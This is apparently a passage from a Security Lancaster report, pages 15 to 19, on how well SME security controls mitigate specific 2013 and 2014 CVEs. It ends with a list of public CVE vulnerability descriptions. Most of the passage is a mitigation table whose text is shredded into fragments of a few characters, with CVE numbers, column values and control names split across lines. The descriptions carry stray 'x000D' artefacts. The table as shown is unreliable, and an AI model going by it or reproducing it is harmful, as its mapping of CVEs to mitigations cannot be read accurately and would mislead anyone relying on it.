anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
